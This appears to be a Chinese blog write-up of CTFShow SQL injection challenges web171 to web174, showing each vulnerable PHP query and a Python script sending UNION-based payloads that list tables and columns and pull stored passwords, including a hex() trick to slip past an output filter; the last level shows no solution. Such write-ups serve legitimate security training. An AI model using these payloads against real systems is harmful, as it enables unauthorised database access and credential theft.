CtfShow之SQL注入-持续更新
CtfShow之SQL注入-持续更新
用户2616264
发布于 2023-05-18 11:32:39
发布于 2023-05-18 11:32:39
CtfShow之SQL注入
web171
查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";#无过滤的字符型注入。
import requests
url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="
# 查数据库
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
# 查列名
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"
# 查数据
payload = "-1' union select id,username,password from ctfshow_user --+"
res = requests.get(url+payload)
print(res.text)web172
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if($row->username!=='flag'){
$ret['msg']='查询成功';
}#无过滤的字符型注入,添加了条件限制 username!='flag'
import requests
url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+"
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') --+"
res = requests.get(url+payload)
print(res.text)web173
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}
过滤了字符类型的注入,添加了检查结果中是否匹配正则表达式/flag/i
使用hex函数绕过正则过滤import requests
url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+"
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) --+"
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) --+"
res = requests.get(url+payload)
print(res.text)web174
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022/10/19 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
